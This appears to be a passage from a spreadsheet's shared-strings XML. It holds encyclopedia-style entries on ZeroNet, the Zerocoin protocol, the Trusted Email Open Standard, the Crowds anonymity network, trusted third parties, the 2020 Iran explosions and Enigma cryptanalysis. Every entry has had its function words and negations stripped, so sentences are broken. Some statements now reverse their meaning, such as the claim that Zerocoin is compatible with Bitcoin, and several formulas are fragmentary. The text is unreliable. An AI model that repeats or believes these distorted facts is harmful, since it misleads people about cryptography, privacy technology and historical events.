trade commission consumer sentinel network report machine learning credit card fraud detection practical handbook</t>
  </si>
  <si>
    <t>ZeroNet</t>
  </si>
  <si>
    <t>zeronet decentralized web-like network peer-to-peer users, created tamas kocsis 2015, programming network based budapest, hungary; built python; fully open source. instead address, sites identified public (specifically bitcoin address). private allows owner site sign publish changes, propagate network. sites accessed ordinary browser using zeronet application, acts local webhost pages. addition using bitcoin cryptography, zeronet uses trackers bittorrent network negotiate connections peers. zeronet anonymous default, supports routing traffic network.the zeronet website bittorrent tracker blocked mainland china. despite censorship, however, still possible access zeronet behind great firewall china, even tor, bootstrapping meek, connecting peers directly. there take zeronet page still seeders, thus making pages immune third-party methods taking down, including dmca takedown notices. hiatus forks development stopped several months stable release v0.7.1 github. long period time concern zeronet would stop working lack onion-v3 protocol support. geekless implemented support (thanking anonymoose zeroseed 03.11.2021 fork. later zeronet mobile developer, pramukesh announced fork implemented patch fixes released stable version v0.7.6 github fork, intends maintain tamas would abandon project. february 2022, three forks active: zeronet-enhanced/zne first fork onion-v3 support, (and also includes performance enhancements), author seems left project considered insecure zeronetx pushes away infrastructure eventually move rust (programming language) code base zeronet-conservancy maintains existing codebase adds features aimed gradually migrating network designed scratch development network feasibility peer-to-peer online web-sites hypothesised time, pirate suggesting would build network, well bittorrent inc. created closed-source project maelstrom. another application, beaker browser, uses files protocol allow creation, hosting serving websites without need server.sites zeronet known "zites" users. zeronet supports html, javascript. server-side languages like supported, although zeronet achieve user signup/login mysql databases, also distributed p2p. default, sites size limit megabytes, users grant site permission storage space wish. with plugins zeroframe api, sites communicate zeronet calling python javascript. also references "kim dotcom's 'meganet' could bitcoin-inspired spy-resistant internet". upstart business journal. march 2015. external links official website inactive zeronetx official website active zerolink proxy zeronet zeronet read proxy</t>
  </si>
  <si>
    <t>Zerocoin protocol</t>
  </si>
  <si>
    <t>zerocoin privacy protocol proposed 2013 johns hopkins university professor matthew green graduate students, miers christina garman. designed extension bitcoin protocol would improve bitcoin transactions' anonymity coin-mixing capabilities natively built protocol. zerocoin currently compatible bitcoin. history public nature blockchain, users privacy compromised interacting network. address problem, third-party coin mixing service used obscure trail cryptocurrency transactions. 2013, matthew green graduate students (ian miers christina garman) proposed zerocoin protocol cryptocurrency transactions anonymised without going trusted third-party, coin destroyed minted erase history.while coin spent, information available reveal exactly coin spent. initially, zerocoin protocol planned integrated bitcoin network. however, proposal accepted bitcoin community. thus, zerocoin developers decided launch protocol independent cryptocurrency. project create standalone cryptocurrency implementing zerocoin protocol named "moneta". september 2016, zcoin (xzc), first cryptocurrency implement zerocoin protocol, launched poramin insom team. january 2018, academic paper partially funded zcoin published replacing proof-of-work system memory intensive merkle tree proof algorithm ensuring equitable mining among ordinary users. april 2018, cryptographic flaw found zerocoin protocol allows attacker destroy coins owned honest users, create coins thin air, steal users' coins. zcoin cryptocurrency team acknowledging flaw, stated high difficulty performing attacks probability giving economic benefit attacker. december 2018, zcoin released academic paper proposing lelantus protocol removes need trusted setup hides origin amount coins transaction using zerocoin protocol. architecture transactions zerocoin feature drawn escrow pool, coin's transaction history erased emerges. transactions verified zero-knowledge proofs, mathematical prove statement true without revealing details question. zerocash november 2013, matthew green announced zerocash protocol, provides additional anonymity shielding amount transacted. zerocash reduces transaction sizes 98%, however significantly computationally expensive, taking memory generate. more recent developments protocol reduced zerocash utilizes succinct non-interactive zero-knowledge arguments knowledge (also known zk-snarks), special kind zero-knowledge method proving integrity computations. such proofs less bytes long verified milliseconds, contain additional advantage hiding amount transacted well. however, unlike zerocoin, zerocash requires initial trusted entity.developed matthew green, assistant professor behind zerocoin protocol, zcash first zerocash based cryptocurrency began development 2013. cryptocurrencies zcoin (xzc) late 2014, poramin insom, student masters security informatics johns hopkins university wrote paper implementing zerocoin protocol cryptocurrency matthew green faculty member. roger zcoin's initial investors. poramin also exchanged named "satang" convert thai baht zcoin directly.on february 2017, malicious coding attack zerocoin protocol created 370,000 fake tokens perpetrators sold bitcoins ($440,000). zcoin team announced single-symbol error piece code "allowed attacker create zerocoin spend transactions without corresponding mint". unlike ethereum event, developers opted destroy coins attempt reverse happened newly generated ones.in september 2018, zcoin introduced dandelion protocol hides origin address sender without using onion router (tor) virtual private network (vpn). november 2018, zcoin conducted world's first large-scale party elections thailand democrat party using interplanetary file system (ipfs). december 2018, zcoin implemented merkle tree proof, mining algorithm deters usage application-specific integrated circuit (asic) mining coins memory intensive miners. this allows ordinary users central processing unit (cpu) graphics card mining, enable egalitarianism coin mining. july 2019, zcoin formally departed zerocoin protocol adopting protocol called "sigma" prevents counterfeit privacy coins inflating coin supply. this achieved removing feature called "trusted setup" zerocoin protocol. reception criticism zerocoin added computation time required process, would need performed primarily bitcoin miners. proofs posted blockchain, would also dramatically increase size blockchain. nevertheless, stated original author, proofs could stored outside blockchain.since zerocoin denomination bitcoin used mint zerocoin, anonymity would compromised zerocoins zerocoins) denomination currently minted unspent. potential solution problem would allow zerocoins specific denominations, however, would increase needed computation time since multiple zerocoins could needed transaction. depending specific implementation, zerocoin requires large prime numbers generate parameter cannot easily factored. such, values must either generated trusted parties, rely unfactorable objects avoid requirement trusted party. such setup, however, possible zerocash protocol. references external links official website</t>
  </si>
  <si>
    <t>Trusted Email Open Standard</t>
  </si>
  <si>
    <t>trusted email open standard (teos) anti-spam technique proposed eprivacy group 2003 federal trade commission anti-spam summit. edited stephen cobb, cissp, 35-page white paper describing standard downloaded 30,000 times publication april 2003 year. many elements teos later appeared letter microsoft bill gates submitted u.s. senate commerce committee hearings anti-spam legislation. letter outlined microsoft's position spam crisis handled.at basic level, teos proposes framework trusted identity email senders based secure, fast, lightweight signatures email headers, optimized dns-based systems flexibility ease implementation. teos also provides common-language framework making trusted assertions content individual message. isps email recipients rely assertions manage email. references external links eprivacy group’s teos white paper</t>
  </si>
  <si>
    <t>Crowds (anonymity network)</t>
  </si>
  <si>
    <t>crowds proposed anonymity network anonymous browsing. main idea behind crowds anonymity protocol hide user's communications routing randomly within group similar users. neither collaborating group members receiver therefore sure group packet originated. crowds designed michael reiter aviel rubin. defends internal attackers corrupt receiver, provides anonymity global attacker local eavesdropper (see "crowds: anonymity transactions"). crowds vulnerable predecessor attack; discussed reiter rubin's paper expanded "the predecessor attack: analysis threat anonymous communications systems" matthew wright, micah adler, brian neil levine. crowds introduced concept users blending crowd computers. crowds works each user joins crowd users registering blender single server responsible membership management. when user registers, members crowd notified. blender also responsible distribution, distributes symmetric keys individual pairs jondos, used encryption decryption, respectively packets routed along virtual paths. each user represented jondo machine application runs user's computer. each jondo either submits request server forwards randomly chosen jondo (possibly itself). other jondo tasks strip personal information cookies, identifying header fields. jondo cannot tell request initiated previous jondo request reply follow virtual paths constructed using algorithm involving probabilities. virtual paths torn reconstructed regular basis allow anonymity newly added members. definitions crowds uses defines following terms: sender initiator message receiver final recipient message probable innocence attacker unable greater confidence node initiated message node appears equally likely initiated message user likely innocent not.) local eavesdropper attacker observe incoming outgoing messages proper subset nodes corrupt node node corrupt uses information obtained forwarding message determine sender {\displaystyle number corrupt nodes {\displaystyle number nodes {\displaystyle n-c} number good nodes) {\displaystyle p_{f}} probability forwarding basic design crowds works making node seem equally likely initiator message. said node joins network starting jondo (from "john doe"), small process forward receive requests users. when jondo started nodes network informed node's entrance, begin select forwarder. actually send message node chooses randomly (with uniform probability) nodes network forwards message them. upon receiving message node flips biased coin (with probability {\displaystyle p_{f}&gt;{\frac {1}{2}}} lands heads forwards another random node, otherwise forwards final destination. each node forwarding another node records predecessor tunnel built, used communication sender receiver. algorithm machine onreceive(node message flip biased coin {\displaystyle \pr(heads)=p_{f}} heads then select uniformly random node forward else forward destination record tunnel built security analysis consider question information attacker learn senders receivers transactions, given mechanisms crowds described. local eavesdropper recall every message forwarded path, except final request server, encrypted. thus, eavesdropper able view message emanating user's computer, views message submitted server user's jondo ultimately submits user's request itself. since probability user's jondo ultimately submits request size crowd path created. thus learn probability eavesdropper learns identity receiver decreases function crowd size. moreover, user's jondo ultimately submit request, local eavesdropper sees encrypted address server, suggest yields receiver anonymity (informally) beyond suspicion. (beyond suspicion user suspicious other). collaborating jondos consider collaborating corrupted jondos crowd. because jondo observe plaintext traffic path routed traffic, including address server exposed attacker. question consider attacker determine initiated path. goal collaborators determine member initiated path. analyze confident collaborators immediate predecessor fact path initiator: denote event first collaborator path occupies position path, initiator occupies position (and possibly others). define hk+1 hk+2 denote event first collaborator path immediately preceded path path initiator.note converse true, initiating jondo might appear path multiple times. there case path composed follow: initiator jondo(0 position) ----&gt; jondo(1 position) ----&gt; initiator jondo(2 position) ----&gt; collaborating jondo(3 position)note first collaborator path third position. 4.given notation, collaborators hope determine:p(i|h1+) given collaborator path, probability path initiator first collaborator's immediate predecessor? definition: path initiator probable innocence p(i|h1+)&lt;=1\2. order yield probable innocence path initiator, certain conditions must system. particular, (the probability forwarding system.) number collaborators crowd) total number crowd members path formed) theorem gives sufficient condition ensure probable innocence path initiator. theorem: path initiator probable innocence collaborators case {\displaystyle n\geq {\frac {p_{f}}{p_{f}-{\frac {1}{2}}}}\left(c+1\right)} proof: want show {\displaystyle n\geq {\frac {p_{f}}{p_{f}-{\frac {1}{2}}}}\left(c+1\right)} note that: p(hi) {\displaystyle (p_{f}{\frac {n-c}{n}})^{i-1}({\frac {c}{n}})} order first collaborator position path, path must first wander noncollaborators time probability {\displaystyle {\frac {n-c}{n}}} chooses forward path probability collaborator probability {\displaystyle {\frac {c}{n}}} next facts follow immediately p(h1+) {\displaystyle {\frac {c}{n}}\sum _{k=0}(p_{f}{\frac {n-c}{n}})^{k}=({\frac {c}{n}})({\frac {1}{1-{\frac {p_{f}(n-c)}{n}}}})} p(h2+) {\displaystyle {\frac {c}{n}}\sum _{k=1}(p_{f}{\frac {n-c}{n}})^{k}=({\frac {c}{n}})({\frac {\frac {p_{f}(n-c)}{n}}{1-{\frac {p_{f}(n-c)}{n}}}})} p(h1) {\displaystyle {\frac {c}{n}}} p(i|h1) {\displaystyle p(i|h2) {\displaystyle {\frac {1}{n-c}}} now, p(i) captured p(i) p(h1)p(i|h1) p(h2+)p(ih2+) {\displaystyle {\frac {c(n-np_{f}n+cp_{f}+pf)}{n^{2}-pfn(n-c)}}} since i=&gt;h1+p(i|h1+)= {\displaystyle {\frac {p(i\land h1+)}{p(h1+)}}} {\displaystyle {\frac {p(i)}{p(h1+)}}} {\displaystyle {\frac {n-p_{f}(n-c-1)}{n}}} {\displaystyle n\geq {\frac {p_{f}}{p_{f}-{\frac {1}{2}}}}\left(c+1\right)} p(i|h1+)&lt;=1\2 e.g. pf=3\4, probable innocence guaranteed long static paths dynamic paths tends decrease anonymity properties provided system collaborating jondos. reason probable innocence vanishes collaborators able link many distinct paths initiated jondo. collaborating jondos might able link paths initiated unknown jondo based related path content timing communication paths. prevent this, made paths static, attacker simply multiple paths link jondo. embedded images timing attacks html page include (e.g., address image) that, page retrieved, causes user's browser automatically issue another request. immediate nature requests poses greatest opportunity timing attacks collaborating jondos. first collaborating jondo path, upon returning page path containing automatically retrieved, time duration receives request url. duration sufficiently short, could reveal collaborator's immediate predecessor initiator request. prevention when jondo receives html reply request either received directly user's browser submitted directly server, parses html page identify urls user's browser automatically request result receiving reply. last jondo path requests urls sends back along path original request received. user's jondo, upon receiving requests urls user's browser, forward requests path, rather simply waits urls contents arrive path feeds browser. way, jondos path never requests generated browser, thus cannot glean timing information them. scale measure scale evaluate expected total number appearances jondo makes paths point time. example, jondo occupies positions path position another, makes total three appearances paths. theorem crowd size expected total number appearances jondo makes paths {\displaystyle o({\frac {1}{(1-p_{f})^{2}}}(1+{\frac {1}{n}}))} each jondo's expected number appearances paths virtually constant function size crowd. this suggests crowds able grow quite large. attacks crowds provides perfect anonymity corrupt receiver (i.e. {\displaystyle d\gets degree anonymity) members appear equally likely initiator. showed collaborating corrupt nodes crowds provides probable innocence long {\displaystyle n\geq {\frac {p_{f}}{p_{f}-{\frac {1}{2}}}}\left(c+1\right)} (see paper derivation this), provides degree anonymity {\displaystyle d\gets {\frac {{\frac {n-p_{f}\cdot (n-c-1)}{n}}\cdot \left[{\frac {n}{n-p_{f}\cdot (n-c-1)}}\right]+p_{f}\cdot {\frac {n-c-1}{n}}\cdot \left[n/p_{f}\right]}{\lg(n-c)}}} against predecessor attack crowds succumbs {\displaystyle o\left({\frac {n}{c}}\lg(n)\right)} attack works corrupt node retaining previous path, sender node rounds rebuilding network become apparent initiator reiter rubin mention recommend long (and possible infinite) time path reformations (caused node path leaves network). crowds unable protect global eavesdropper cannot encryption links, node crowds able communicate every node fully connected graph), setting symmetric keys requires {\displaystyle o(n^{2})} pairwise keys; large number feasible. against local eavesdropper crowds provides protection eavesdropper message coming node enter, positively identifies node sender. also onion routing (anonymity network) degree anonymity network references further reading claudia diaz stefaan seys joris claessens bart preneel (april 2002). roger dingledine paul syverson (ed.). "towards measuring anonymity". proceedings privacy enhancing technologies workshop (pet 2002). springer-verlag, lncs 2482. archived original 2006-07-10. retrieved 2005-11-10. michael reiter aviel rubin (june 1998). "crowds: anonymity transactions" (pdf). transactions information system security. (1). archived original (pdf) 2005-12-12. retrieved 2005-11-23. matthew wright micah adler brian neil levine clay shields (2004). "the predecessor attack: analysis threat anonymous communications systems" (pdf). transactions information system security. press. (4): 489–522. archived original (pdf) 2005-09-24. retrieved 2005-11-23. matthew wright micah adler brian neil levine clay shields (february 2002). analysis degradation anonymous protocols" (pdf). proceedings network distributed security symposium ndss '02. ieee. archived original (pdf) 2006-02-19. retrieved 2005-11-23. external links anonymity bibliography cryptology eprint archive</t>
  </si>
  <si>
    <t>Trusted third party</t>
  </si>
  <si>
    <t>cryptography, trusted third party (ttp) entity facilitates interactions parties trust third party; third party reviews critical transaction communications parties, based ease creating fraudulent digital content. models, relying parties trust secure interactions. ttps common number commercial transactions cryptographic digital transactions well cryptographic protocols, example, certificate authority (ca) would issue digital certificate parties next example. becomes trusted-third-party certificates issuance. likewise transactions need third party recordation would also need third-party repository service kind another. 'trusted' means system needs trusted interests, option (either involuntarily) interests. 'trusted' also means verify system operating interests, hence need trust corollary: system verified operate interests, would need trust. shown operate interests would example suppose alice wish communicate securely choose cryptography. without ever bob, alice need obtain encrypt messages him. case, third party previously seen person), otherwise willing vouch (typically public certificate) belongs person indicated certificate, case, bob. discussions, third person often called trent. trent gives alice, uses send secure messages bob. alice trust bob's trusts trent. discussions, simply assumed valid reasons course issue alice able properly identify trent trent someone impersonating trent). actual practice arrange (trustable) third parties type unsolved problem. long motives greed, politics, revenge, etc., perform supervise) work done entity provide potential loopholes necessary trust leak. problem, perhaps unsolvable one, ancient notorious. that large impersonal corporations make promises accuracy attestations correctness claimed public-key-to-user correspondence (e.g., certificate authority part public infrastructure) changes little. many environments, strength trust weak weakest link. when infrastructure trusted breached whole chain trust broken. 2011 incident diginotar broke trust dutch governments pki, textbook example weaknesses system effects bruce schneier pointed out, 2013 mass surveillance disclosures, third party fact ever trusted. cryptosystem includes variant form trust. users digitally sign other's certificates instructed confident person public belong together. signing party combining get-together certificate signing. nonetheless, doubt caution remain sensible users careless signing others' certificates.trusting humans, organizational creations, risky. example, financial matters, bonding companies find avoid losses real world. parallels outside cryptography outside cryptography, many places makes provision trusted third parties upon whose claims rely. instance, notary public acts trusted third party authenticating acknowledging signatures documents. ttp's role cryptography much same, least principle. certificate authority partially fills notary function, attesting identity key's owner, whether party mentally aware apparent free duress (nor certificate authority attest date signature). also trusted computing base double-spending references</t>
  </si>
  <si>
    <t>2020 Iran explosions</t>
  </si>
  <si>
    <t>2020 iran explosions series explosions iran, undetermined causes origin. first reported june 2020, explosions' locations included advanced centrifuge assembly facility, alleged missile sites, petrochemical centers, power plants medical clinics. government denied reports explosions missile sites acknowledging damage largest nuclear enrichment facility natanz.some western iranian officials stated cause explosions israeli cyber attacks covert israeli strikes. government vowed retaliate sabotage confirmed natanz nuclear facility. timeline parchin explosion shiraz blackout noon june 2020, explosion military complex parchin, kilometers southeast capital tehran. within hour power outage affected half southern city shiraz; housing major military facilities. officials declared explosion storage accident said explosion power station shiraz, causing blackout. western analyst stated explosion parchin occurred missile storage facility, hidden nuclear detonation technology work.a western analyst claimed explosion parchin caused israeli cyberattack, senior iranian commander said could comment whether explosion cyberattack conclusion issue. citing unnamed senior source, kuwaiti newspaper al-jarida reported facility destroyed airstrike israeli f-35 stealth fighter jets.on june 2020, american israeli officials speaking york times said "had nothing with" explosion parchin. tehran clinic explosion june 2020, explosion occurred sina at'har health center capital tehran, killing people including women men. according deputy mayor tehran explosion caused leak medical tanks building. natanz centrifuge assembly facility explosion july 2020, explosion centrifuge assembly facility near city natanz. three quarters above-ground parts facility advanced centrifuges assembled damaged. iran admitted serious damage facility western analysts said explosion back iranian nuclear program years.the day, us-based source reported group calling "homeland panthers" (persian: یوزپلنگان yuzpalangan vatan) claimed responsibility explosion natanz nuclear enrichment facility. york times claimed source identified "middle eastern intelligence official knowledge episode" told newspaper israel responsible attack, powerful bomb used. addition, cited iranian revolutionary guards corps member briefed topic spoken newspaper anonymously claiming explosive device used. york times later reported officials knowledge stated blast likely result bomb, possibly strategic line, cyberattack question. kuwaiti newspaper al-jarida reported israel caused explosion cyberattack. khuzestan explosions july 2020, explosion shahid medhaj zargan power plant city ahvaz. meanwhile people injured following chlorine leak karun petrochemical center city mahshahr, near ahvaz. baqershahr explosion july 2020, people killed others injured following explosion inside oxygen factory town bandar-e mahshahr, south capital tehran. irib said "human error" cause blast.according western analysts factory near warehouse archive information iran's nuclear program stolen raid israeli intelligence agents 2018. claimed factory belongs iranian automotive manufacturer closely cooperates iranian ministry defense well islamic revolutionary guard corps. tehran explosions july 2020, explosion reported western tehran. officials denied explosion took place admitted power area.according western analysts blast missile facility/warehouse belonging revolutionary guards. analysts speaking york times said blast area underground facilities, associated chemical weapons research unidentified military production site. intelligence official told york times israel possibly behind explosion.on july 2020, explosion shook residential building tehran, injuring person. mahshahr petrochemical plant explosion july 2020, fire followed explosion tondgooyan petrochemical plant southwest. spokesperson petrochemical company said fire explosion occurred "technical problems", "hot weather" also blame. mashhad explosion july 2020, explosion industrial complex near northeastern city mashhad. mehr news agency said explosion occurred condensate storage tank exploded, police investigating cause. ahvaz pipeline explosion july 2020, explosion reported pipeline southwestern city ahvaz. isfahan power plant explosion july 2020, explosion power plant isfahan province. injured. alleged israeli aims according report business insider, citing unnamed former israeli official european union intelligence official, israel behind attacks, european source "fearing" goal israeli government provoke military confrontation iran u.s. president donald trump remains office. according official, "there would less appetite adventures secret missions blow nuclear facilities biden administration." response october 2020, rafael grossi, director general international atomic energy agency (iaea) confirmed iran started building underground centrifuge assembly plant explosions, added iran also continues stockpile greater amounts low-enriched uranium, appear possess enough produce weapon. also stuxnet assassination iranian nuclear scientists iran–israel proxy conflict references</t>
  </si>
  <si>
    <t>Cryptanalysis of the Enigma</t>
  </si>
  <si>
    <t>cryptanalysis enigma ciphering system enabled western allies world read substantial amounts morse-coded radio communications axis powers enciphered using enigma machines. this yielded military intelligence which, along decrypted axis radio teleprinter transmissions, given codename ultra. enigma machines family portable cipher machines rotor scramblers. good operating procedures, properly enforced, would made plugboard enigma machine unbreakable. however, german military forces, secret services, civilian agencies used enigma employed poor operating procedures, poor procedures allowed enigma machines reverse-engineered ciphers read. german plugboard-equipped enigma became nazi germany's principal crypto-system. december 1932 "broken" mathematician marian rejewski polish general staff's cipher bureau, using mathematical permutation group theory combined french-supplied intelligence material obtained german spy. 1938 rejewski invented device, cryptologic bomb, henryk zygalski devised sheets, make cipher-breaking efficient. five weeks outbreak world late july 1939, conference south warsaw, polish cipher bureau shared enigma-breaking techniques technology french british. during german invasion poland, core polish cipher bureau personnel evacuated romania france, established bruno signals intelligence station french facilities support. successful cooperation among poles, french, british bletchley park continued june 1940, france surrendered germans. from beginning, british government code cypher school (gc&amp;cs) bletchley park built extensive cryptanalytic capability. initially decryption mainly luftwaffe (german force) heer (german army) messages, kriegsmarine (german navy) employed much secure procedures using enigma. alan turing, cambridge university mathematician logician, provided much original thinking design cryptanalytical bombe machines instrumental eventually breaking naval enigma. however, kriegsmarine introduced enigma version fourth rotor u-boats, resulting prolonged period messages could decrypted. with capture relevant cipher keys much faster navy bombes, regular, rapid reading u-boat messages resumed. general principles enigma machines produced polyalphabetic substitution cipher. during world inventors several countries realized purely random sequence, containing repetitive pattern, would, principle, make polyalphabetic substitution cipher unbreakable. this development rotor cipher machines alter character plaintext produce ciphertext, means scrambler comprising rotors alter electrical path character character, input device output device. this constant altering electrical pathway produces long period pattern—the sequence substitution alphabet—repeats. decrypting enciphered messages involves three stages, defined somewhat differently modern cryptography. first, identification system use, case enigma; second, breaking system establishing exactly encryption takes place, third, solving, involves finding machine individual message, i.e. message key. today, often assumed attacker knows encipherment process works (see kerckhoffs's principle) breaking often used solving key. enigma machines, however, many potential internal wiring states reconstructing machine, independent particular settings, difficult task. enigma machines enigma rotor cipher machine potentially excellent system. generated polyalphabetic substitution cipher, period repetition substitution alphabet much longer message, messages, sent key. major weakness system, however, letter could enciphered itself. this meant possible solutions could quickly eliminated letter appearing place ciphertext putative piece plaintext. comparing possible plaintext keine besonderen ereignisse (literally, special occurrences"—perhaps better translated "nothing report"; phrase regularly used german outpost north africa), section ciphertext, might produce following: structure mechanism enigma consisted keyboard connected battery current entry plate wheel (german: eintrittswalze), right hand scrambler (usually plugboard military versions). this contained contacts made electrical connection spring-loaded pins right hand rotor. internal wiring core rotor provided electrical pathway pins side different connection points other. left hand side rotor made electrical connection rotor left. leftmost rotor made contact reflector (german: umkehrwalze). reflector provided thirteen paired connections return current back scrambler rotors, eventually lampboard lamp letter illuminated.whenever keyboard pressed, stepping motion actuated, advancing rightmost rotor position. because moved pressed sometimes called fast rotor. when notch rotor engaged pawl middle rotor, moved; similarly leftmost ('slow') rotor. there huge number ways connections within scrambler rotor—and entry plate keyboard plugboard lampboard—could arranged. reflector plate fewer, still large number options possible wirings.each scrambler rotor could starting positions (any letter alphabet). enigma machines three rotors, sequence scrambler—which known wheel order (wo) allied cryptanalysts—could selected possible. later enigma models included alphabet ring like tyre around core rotor. this could positions relation rotor's core. ring contained notches engaged pawl advanced next rotor left.later still, three rotors scrambler selected five case german navy, eight rotors. alphabet rings rotors viii contained notches which, despite shortening period substitution alphabet, made decryption difficult. most military enigmas also featured plugboard (german: steckerbrett). this altered electrical pathway keyboard entry wheel scrambler and, opposite direction, scrambler lampboard. exchanging letters reciprocally, plugged pressing would lead current entering scrambler position, pressed current would enter connections applied current lamp panel. decipher german military enigma messages, following information would need known. logical structure machine (unchanging) wiring keyboard (and lampboard) entry plate. wiring rotor. number position(s) turnover notches rings rotors. wiring reflectors.internal settings (usually changed less frequently external settings) selection rotors ordering spindle (walzenlage "wheel order"). positions alphabet ring relation core rotor (ringstellung "ring settings").external settings (usually changed frequently internal settings) plugboard connections (steckerverbindungen "stecker values"). rotor positions start enciphering text message.discovering logical structure machine called "breaking" one-off process except changes additions made machines. finding internal external settings messages called "solving" although breaking often used process well. security properties various enigma models provided different levels security. presence plugboard (steckerbrett) substantially increased security encipherment. each pair letters connected together plugboard lead referred stecker partners, letters remained unconnected said self-steckered. general, unsteckered enigma used commercial diplomatic traffic could broken relatively easily using hand methods, attacking versions plugboard much difficult. british read unsteckered enigma messages sent spanish civil war, also italian naval traffic enciphered early world strength security ciphers produced enigma machine product large numbers associated scrambling process. produced polyalphabetic substitution cipher period (16,900) many times length longest message. 3-rotor scrambler could 17,576 ways, 4-rotor scrambler 17,576 456,976 ways. with leads plugboard, number ways pairs letters could interchanged {\displaystyle {\tfrac {26!}{(26-2l)!\times l!\times 2^{l}}}} with l=6, number combinations 100,391,791,500 (100 billion) leads, 150,738,274,937,250 (151 trillion).however, enigma used germans meant that, settings whatever period represented setting sheet) established, rest messages network could quickly deciphered.the security enigma ciphers fundamental weaknesses proved helpful cryptanalysts. letter could never encrypted itself, consequence reflector. this property great help using cribs—short sections plaintext thought somewhere ciphertext—and could used eliminate crib particular position. possible location, letter crib matched letter ciphertext position, location could ruled out. feature british mathematician logician alan turing exploited designing british bombe. plugboard connections reciprocal, plugged likewise became property mathematician gordon welchman bletchley park propose diagonal board introduced bombe, substantially reducing number incorrect rotor settings bombes found. notches alphabet rings rotors different positions, helped cryptanalysts work wheel order observing middle rotor turned right-hand rotor. there substantial weaknesses, policies practice, enigma used (see 'operating shortcomings' below). setting enigma featured major operational convenience symmetrical self-inverse). this meant decipherment worked encipherment, ciphertext typed sequence lamps yielded plaintext. identical setting machines transmitting receiving ends achieved setting procedures. these varied time time across different networks. they consisted setting sheets codebook. distributed users network, changed regularly. message transmitted indicator part message preamble. word also used bletchley park describe network used enigma setting sheets. initially recorded using coloured pencils given names red, light blue etc., later names birds kestrel. during world settings networks lasted hours, although towards war, changed frequently. sheets columns specifying, month, rotors used positions, ring positions plugboard connections. security, dates reverse chronological order page, could destroyed finished with. september 1938, transmitting operator indicated receiving operator(s) rotors, choosing three letter message (the specific message) enciphering twice using specified initial ring positions (the grundstellung). resultant 6-letter indicator, transmitted enciphered text message. suppose specified grundstellung rao, chosen 3-letter message ihl, operator would rotors encipher twice. resultant ciphertext, dqyqqt, would transmitted, point rotors would changed message (ihl) message enciphered. receiving operator would specified grundstellung decipher first letters, yielding ihlihl. receiving operator, seeing repeated message would know corruption decipher message. weakness indicator procedure came factors. first, global grundstellung —this changed september 1938 operator selected initial position encrypt message key, sent initial position clear followed enciphered message key. second problem repetition message within indicator, serious security flaw. message setting encoded twice, resulting relation first fourth, second fifth, third sixth character. this security problem enabled polish cipher bureau break pre-war enigma system early 1932. 1940 germans changed procedures encipher message once. british efforts 1927, openly purchased commercial enigma. operation analysed reported. although leading british cryptographer, dilly knox veteran world cryptanalytical activities royal navy's room 40), worked decipherment messages generated practice with. after germany supplied modified commercial machines nationalist side spanish civil war, italian navy (who also aiding nationalists) using version commercial enigma plugboard, britain could intercept radio broadcast messages. april 1937 knox made first decryption enigma encryption using technique called buttoning discover rotor wirings another called rodding solve messages. this relied heavily cribs crossword-solver's expertise italian, yielded limited number spaced-out letters time. britain ability read messages broadcast germany, used military enigma machine. polish breakthroughs 1920s german military began using 3-rotor enigma, whose security increased 1930 addition plugboard. polish cipher bureau sought break threat poland faced germany, early attempts succeed. near beginning 1929, polish cipher bureau realized mathematicians make good codebreakers; bureau invited math students poznań university take class cryptology. after class, bureau recruited students work part-time bureau branch poznań students. branch operated time. september 1932, 27-year-old polish mathematician marian rejewski fellow poznań university mathematics graduates, henryk zygalski jerzy różycki, joined bureau full-time moved warsaw. their first task reconstruct four-letter german naval cipher.near 1932 rejewski asked work couple hours breaking enigma. rejewski's characteristics method marian rejewski quickly spotted germans' major procedural weaknesses specifying single indicator setting (grundstellung) messages network day, repeating operator's chosen message enciphered 6-letter indicator. those procedural mistakes allowed rejewski decipher message keys without knowing machine's wirings. example dqyqqt enciphered indicator, known first letter fourth letter represent letter, enciphered three positions apart scrambler sequence. similarly second fifth positions, third sixth. rejewski exploited fact collecting sufficient messages enciphered indicator setting, assembling three tables 1,4, 2,5, pairings. each tables might look something like following: path first letter corresponding fourth letter, letter first letter corresponding fourth letter, first letter recurs, traces cycle group. following table contains cycle groups. rejewski recognized cycle group must pair another group length. even though rejewski know rotor wirings plugboard permutation, german mistake allowed reduce number possible substitution ciphers small number. pairing above, 1×3×9=27 possibilities substitution ciphers positions rejewski also exploited cipher clerk laziness. scores messages would enciphered several cipher clerks, messages would encrypted indicator. that meant clerks happened choose three letter starting position. such collision rare randomly selected starting positions, lazy cipher clerks often chose starting positions "aaa", "bbb", "ccc". those security mistakes allowed rejewski solve permutations used encipher indicator. that solution extraordinary feat. rejewski without knowing plugboard permutation rotor wirings. even solving permutations, rejewski know plugboard positions rotors. knowing permutations also allow rejewski read messages. rotor wiring before rejewski started work enigma, french spy, hans-thilo schmidt, worked germany's cipher office berlin access enigma documents. even help documents, french make progress breaking enigma. french decided share material british polish allies. december 1931 meeting, french provided gwido langer, head polish cipher bureau, copies enigma material. langer asked french material, gustave bertrand french military intelligence quickly obliged; bertrand provided additional material september 1932. documents included german manuals pages enigma daily keys.in december 1932, bureau provided rejewski german manuals monthly keys. material enabled rejewski achieve "one important breakthroughs cryptologic history" using theory permutations groups work enigma scrambler wiring.rejewski could look day's cipher traffic solve permutations sequential positions used encipher indicator. since rejewski cipher day, knew could factor plugboard permutation. assumed keyboard permutation commercial enigma, factored out. knew rotor order, ring settings, starting position. developed equations would allow solve rightmost rotor wiring assuming rotors left move.he attempted solve equations, failed inconsistent results. after thought, realized assumptions must wrong. rejewski found connections military enigma's keyboard entry ring not, commercial enigma, order keys german typewriter. made inspired correct guess alphabetical order. britain's dilly knox astonished learned, july 1939, arrangement simple.with assumption, rejewski succeeded solving wiring rightmost rotor. next month's cipher traffic used different rotor rightmost position, rejewski used equations solve wiring. with rotors known, remaining third rotor reflector wiring determined. without capturing single rotor reverse engineer, rejewski determined logical structure machine. polish cipher bureau enigma machine replicas made; replicas called "enigma doubles". grill method poles machine's wiring secrets, still needed determine daily keys cipher traffic. poles would examine enigma traffic method characteristics determine permutations used indicator. poles would grill method determine rightmost rotor position. that search would complicated plugboard permutation, permutation swapped pairs letters enough disrupt search. grill method also determined plugboard wiring. grill method could also used determine middle left rotors setting (and tasks simpler plugboard), poles eventually compiled catalog 3×2×26×26=4056 possible permutations (reflector leftmost rotor permutations), could look answer. remaining secret daily would ring settings, poles would attack problem brute force. most messages would start three letters "anx" german "to" character used space). take almost 26×26×26=17576 trials, doable. once ring settings found, poles could read day's traffic. germans made easy poles beginning. rotor order changed every quarter, poles would search rotor order. later germans changed every month, would cause much trouble, either. eventually, germans would change rotor order every day, late (after poland overrun) rotor order might changed day. poles kept improving techniques germans kept improving security measures. invariant cycle lengths card catalog rejewski realised that, 